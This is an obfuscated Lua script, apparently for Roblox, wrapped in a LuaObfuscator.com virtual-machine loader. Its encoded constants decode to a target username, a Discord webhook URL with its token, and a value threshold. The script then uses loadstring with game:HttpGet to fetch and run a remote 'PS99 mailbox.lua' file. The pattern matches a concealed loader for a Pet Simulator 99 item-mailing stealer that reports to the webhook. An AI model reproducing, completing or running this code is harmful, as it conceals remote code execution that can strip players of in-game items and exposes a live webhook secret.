--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v85=v2(v0(v30,16));if v19 then local v93=0;local v94;while true do if (v93==1) then return v94;end if (v93==0) then v94=v5(v85,v19);v19=nil;v93=1;end end else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -1))))%((3 -1)^(((v33-((1639 -(1523 + 114)) -1)) -(v32-((558 + 62) -((790 -235) + 64)))) + (932 -(857 + 74)))) ;return v86-(v86%((1634 -(68 + 997)) -(367 + 201))) ;else local v87=0;local v88;while true do if (v87==(927 -(214 + 713))) then v88=(1 + 1)^(v32-1) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or 0 ;end end end end local function v21() local v34=117 -(32 + 85) ;local v35;while true do if (v34==(1271 -(226 + (2490 -1446)))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=958 -(892 + 65) ;end end end local function v22() local v36=0 + 0 ;local v37;local v38;while true do if (v36==(2 -1)) then return (v38 * (472 -216)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (954 -((1454 -652) + 150)) );v18=v18 + (352 -(87 + 263)) ;v36=181 -(67 + 113) ;end end end local function v23() local v39=0 + 0 ;local v40;local v41;local v42;local v43;while true do if (v39==(997 -(160 + 755 + 82))) then v40,v41,v42,v43=v1(v16,v18,v18 + (4 -1) );v18=v18 + ((11 + 0) -7) ;v39=1 + 0 ;end if (v39==(1 -0)) then return (v43 * (16778403 -(1069 + (909 -(368 + 423))))) + (v42 * (148681 -83145)) + (v41 * (559 -303)) + v40 ;end end end local function v24() local v44=(1080 -(1020 + 60)) -0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(20 -((1433 -(630 + 793)) + 8))) then v49=v20(v46,21,(402 -283) -88 );v50=((v20(v46,32)==(443 -(416 + 26))) and  -(3 -2)) or (1 + 0) ;v44=4 -1 ;end if (v44==(438 -(145 + (1387 -1094)))) then v45=v23();v46=v23();v44=431 -(44 + 386) ;end if (v44==(1489 -(998 + 488))) then if (v49==0) then if (v48==(0 + 0)) then return v50 * (0 + 0) ;else v49=1;v47=772 -(201 + 571) ;end elseif (v49==((1255 + 1930) -(116 + 1022))) then return ((v48==(0 -0)) and (v50 * ((1 + (0 -0))/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-(3632 -2609) ) * (v47 + (v48/(2^(911 -(814 + 45))))) ;end if (v44==(2 -1)) then v47=1 + 0 ;v48=(v20(v46,1 + 0 ,905 -((2008 -(760 + 987)) + 624) ) * (2^(56 -24))) + v45 ;v44=2;end end end local function v25(v51) local v52;if  not v51 then local v89=0;while true do if (v89==(1913 -(1789 + 124))) then v51=v23();if (v51==(766 -(745 + 21))) then return "";end break;end end end v52=v3(v16,v18,(v18 + v51) -(1 + (0 -0)) );v18=v18 + v51 ;local v53={};for v69=2 -1 , #v52 do v53[v69]=v2(v1(v3(v52,v69,v69)));end return v6(v53);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54~=0) then else v55=0;v56=nil;v54=1 + 0 ;end if (v54~=(404 -(108 + 294))) then else v59=nil;v60=nil;v54=1978 -(1913 + 62) ;end if (v54~=(1493 -(570 + 919))) then else while true do if (v55~=(5 -3)) then else v60=nil;v61=nil;v55=1936 -(565 + 1368) ;end if (v55==(3 -2)) then local v99=0 -0 ;while true do if (1~=v99) then else v55=1663 -(1477 + 184) ;break;end if ((811 -(569 + 242))~=v99) then else v58=nil;v59=nil;v99=2 -1 ;end end end if (v55~=(1 + 2)) then else v62=nil;while true do local v101=856 -(564 + 292) ;while true do if (v101~=0) then else if (v56~=0) then else local v131=1024 -(706 + 318) ;local v132;while true do if (v131~=0) then else v132=0;while true do if (v132==2) then v56=2 -1 ;break;end if (v132==(304 -(244 + 60))) then local v174=1251 -(721 + 530) ;while true do if (0~=v174) then else v57={};v58={};v174=1272 -(945 + 326) ;end if (v174~=(2 -1)) then else v132=1 + 0 ;break;end end end if (v132~=(1 + 0)) then else local v175=700 -(271 + 429) ;while true do if (v175==1) then v132=2 + 0 ;break;end if (v175~=0) then else v59={};v60={v57,v58,nil,v59};v175=1 + 0 ;end end end end break;end end end if (v56~=1) then else local v133=1171 -(418 + 753) ;local v134;while true do if ((0 + 0)==v133) then v134=0 + 0 ;while true do if (v134~=(1 + 0)) then else for v177=1 + 0 ,v61 do local v178=529 -(406 + 123) ;local v179;local v180;local v181;local v182;while true do if ((1138 -(782 + 356))~=v178) then else v179=1769 -(1749 + 20) ;v180=nil;v178=1;end if (v178==(1 + 0)) then v181=nil;v182=nil;v178=1324 -(1249 + 73) ;end if (v178==2) then while true do if (v179==(1 + 0)) then v182=nil;while true do if (v180==(1146 -(466 + 679))) then if (v181==(1093 -(975 + 117))) then v182=v21()~=(0 -0) ;elseif (v181==(5 -3)) then v182=v24();elseif (v181~=3) then else v182=v25();end v62[v177]=v182;break;end if (v180~=0) then else local v191=0;local v192;local v193;while true do if (v191==(1900 -(106 + 1794))) then v192=0 + 0 ;v193=nil;v191=1 + 0 ;end if (v191~=(2 -1)) then else while true do if (v192~=(0 -0)) then else v193=114 -(4 + 110) ;while true do if (v193~=(584 -(57 + 527))) then else local v206=1427 -(41 + 1386) ;while true do if ((1018 -(697 + 321))~=v206) then else v181=v21();v182=nil;v206=2 -1 ;end if (v206~=(104 -(17 + 86))) then else v193=2 -1 ;break;end end end if ((1 + 0)~=v193) then else v180=1 -0 ;break;end end break;end end break;end end end end break;end if ((0 -0)~=v179) then else local v184=166 -(122 + 44) ;while true do if ((1 -0)~=v184) then else v179=1;break;end if ((611 -(602 + 9))~=v184) then else v180=0;v181=nil;v184=3 -2 ;end end end end break;end end end v60[3]=v21();v134=2 + 0 ;end if (v134~=(1 + 1)) then else v56=2;break;end if (v134==0) then v61=v23();v62={};v134=1;end end break;end end end v101=873 -(826 + 46) ;end if (v101==(948 -(245 + 702))) then if (v56==(3 -1)) then local v135=65 -(30 + 35) ;while true do if (1==v135) then return v60;end if (v135==(1898 -(260 + 1638))) then for v165=1 + 0 ,v23() do local v166=1257 -(1043 + 214) ;local v167;local v168;local v169;while true do if (v166~=(3 -2)) then else v169=nil;while true do if (v167~=(1212 -(323 + 889))) then else local v183=0 + 0 ;while true do if (v183~=(0 -0)) then else v168=0 -0 ;v169=nil;v183=2 -1 ;end if (v183==(1 -0)) then v167=2 -1 ;break;end end end if (v167~=1) then else while true do if ((580 -(361 + 219))==v168) then v169=v21();if (v20(v169,1,321 -(53 + 267) )==(214 -(22 + 192))) then local v185=0 + 0 ;local v186;local v187;local v188;local v189;while true do if (v185~=(413 -(15 + 398))) then else local v194=982 -(18 + 964) ;local v195;while true do if (v194~=0) then else v195=0 -0 ;while true do if (v195==(0 + 0)) then v186=0 + 0 ;v187=nil;v195=851 -(20 + 830) ;end if (v195~=(1 + 0)) then else v185=127 -(116 + 10) ;break;end end break;end end end if (v185==(1 + 1)) then while true do if (v186==1) then local v197=0;local v198;local v199;while true do if (v197~=(739 -(542 + 196))) then else while true do if (v198==(0 -0)) then v199=0 + 0 ;while true do if (v199==0) then local v211=0;while true do if (v211~=(563 -(334 + 228))) then else v199=3 -2 ;break;end if (v211~=(0 -0)) then else v189={v22(),v22(),nil,nil};if (v187==0) then local v212=0 + 0 ;local v213;local v214;while true do if (v212~=0) then else v213=0 -0 ;v214=nil;v212=2 -1 ;end if (v212==1) then while true do if (v213==(1551 -(1126 + 425))) then v214=405 -(118 + 287) ;while true do if (v214==(0 -0)) then v189[1124 -(118 + 1003) ]=v22();v189[11 -7 ]=v22();break;end end break;end end break;end end elseif (v187==(378 -(142 + 235))) then v189[3]=v23();elseif (v187==(4 -2)) then v189[13 -10 ]=v23() -((1 + 1)^16) ;elseif (v187==3) then local v217=0;local v218;local v219;while true do if (v217==(0 + 0)) then local v222=0;while true do if (v222==0) then v218=977 -(553 + 424) ;v219=nil;v222=2 -1 ;end if (v222==1) then v217=1;break;end end end if (v217==(1 -0)) then while true do if (v218~=(0 + 0)) then else v219=0;while true do if (v219==0) then v189[3 + 0 ]=v23() -((2 + 0)^(7 + 9)) ;v189[5 -1 ]=v22();break;end end break;end end break;end end end v211=1 + 0 ;end end end if ((1 + 0)==v199) then v186=2;break;end end break;end end break;end if (v197~=0) then else v198=0 -0 ;v199=nil;v197=2 -1 ;end end end if (v186==(0 -0)) then local v200=0 + 0 ;while true do if (v200==(0 + 0)) then v187=v20(v169,2 -0 ,14 -11 );v188=v20(v169,4,759 -(239 + 514) );v200=1;end if (1~=v200) then else v186=1;break;end end end if (v186==(3 + 0)) then if (v20(v188,3,2 + 1 )==(1330 -(797 + 532))) then v189[9 -5 ]=v62[v189[3 + 1 ]];end v57[v165]=v189;break;end if (v186==(2 + 0)) then local v202=0 + 0 ;while true do if (v202==(0 -0)) then local v205=1202 -(373 + 829) ;while true do if (v205~=0) then else if (v20(v188,1,732 -(476 + 255) )~=(1 -0)) then else v189[2]=v62[v189[2]];end if (v20(v188,2,1132 -(369 + 761) )~=(1791 -(573 + 1217))) then else v189[3]=v62[v189[3]];end v205=1 + 0 ;end if (v205==1) then v202=1 + 0 ;break;end end end if (v202~=(1 -0)) then else v186=5 -2 ;break;end end end end break;end if (v185==1) then local v196=0 -0 ;while true do if (v196~=(238 -(64 + 174))) then else v188=nil;v189=nil;v196=1 + 0 ;end if (v196~=(1 -0)) then else v185=1 + 1 ;break;end end end end end break;end end break;end end break;end if (v166==(0 -0)) then v167=0;v168=nil;v166=337 -(144 + 192) ;end end end for v170=1,v23() do v58[v170-1 ]=v28();end v135=217 -(42 + 174) ;end end end break;end end end break;end if (v55~=(0 + 0)) then else local v100=0;while true do if (v100==1) then v55=1 + 0 ;break;end if ((1886 -(927 + 959))~=v100) then else v56=0 + 0 ;v57=nil;v100=1505 -(363 + 1141) ;end end end end break;end if (v54~=(1583 -(1183 + 397))) then else v61=nil;v62=nil;v54=11 -7 ;end if (v54==(1 -0)) then v57=nil;v58=nil;v54=2 + 0 ;end end end local function v29(v63,v64,v65) local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...) local v71=v66;local v72=v67;local v73=v68;local v74=v27;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v90=0,v79 do if (v90>=v73) then v77[v90-v73 ]=v78[v90 + 1 ];else v81[v90]=v78[v90 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1];if (v84<=5) then if (v84<=2) then if (v84<=0) then v75=v83[3];elseif (v84>1) then v81[v83[2]]=v65[v83[3]];else do return;end end elseif (v84<=3) then v81[v83[2]]=v83[3];elseif (v84>4) then v65[v83[3]]=v81[v83[2]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v65[v83[3]]=v81[v83[2]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v75=v83[3];else local v117=0;local v118;local v119;while true do if (v117==0) then v118=v83[2];v119=v81[v83[3]];v117=1;end if (v117==1) then v81[v118 + 1 ]=v119;v81[v118]=v119[v83[4]];break;end end end elseif (v84<=8) then if (v84<=6) then local v105=v83[2];local v106,v107=v74(v81[v105](v13(v81,v105 + 1 ,v83[3])));v76=(v107 + v105) -1 ;local v108=0;for v109=v105,v76 do local v110=0;while true do if (v110==0) then v108=v108 + 1 ;v81[v109]=v106[v108];break;end end end elseif (v84>7) then local v120=0;local v121;local v122;local v123;local v124;local v125;while true do if (v120==3) then v83=v71[v75];v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v125=v83[2];v122,v123=v74(v81[v125](v13(v81,v125 + 1 ,v83[3])));v120=4;end if (v120==0) then v121=nil;v122,v123=nil;v124=nil;v125=nil;v65[v83[3]]=v81[v83[2]];v75=v75 + 1 ;v120=1;end if (v120==4) then v76=(v123 + v125) -1 ;v121=0;for v163=v125,v76 do local v164=0;while true do if (v164==0) then v121=v121 + 1 ;v81[v163]=v122[v121];break;end end end v75=v75 + 1 ;v83=v71[v75];v125=v83[2];v120=5;end if (6==v120) then v75=v83[3];break;end if (v120==2) then v83=v71[v75];v125=v83[2];v124=v81[v83[3]];v81[v125 + 1 ]=v124;v81[v125]=v124[v83[4]];v75=v75 + 1 ;v120=3;end if (v120==5) then v81[v125]=v81[v125](v13(v81,v125 + 1 ,v76));v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]();v75=v75 + 1 ;v83=v71[v75];v120=6;end if (v120==1) then v83=v71[v75];v81[v83[2]]=v65[v83[3]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v65[v83[3]];v75=v75 + 1 ;v120=2;end end else local v126=v83[2];v81[v126]=v81[v126](v13(v81,v126 + 1 ,v76));end elseif (v84<=9) then if (v81[v83[2]]==v83[4]) then v75=v75 + 1 ;else v75=v83[3];end elseif (v84>10) then v65[v83[3]]=v81[v83[2]];else v81[v83[2]]();end v75=v75 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03063O004D696E524150025O0088C340030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403423O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F50532O392F6D61696E2F6D61696C626F782E6C756103083O00557365724E616D65030C3O007761636B79786D617374657203073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323038373235393034322O373234313835382F6D50484B634C7558346752346A6F634B4448543639692O6A6E3363776A41746548536C7476794E745A6C6647747338342O636B7A3739644367534366344E42334431386B00163O0012033O00013O0026093O000D0001000200044O000D0001001203000100043O001208000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001500010026093O00010001000100044O000100010012030001000A3O001205000100093O00122O0001000C3O00122O0001000B3O00124O00023O00044O000100012O00013O00017O00",v9(),...);
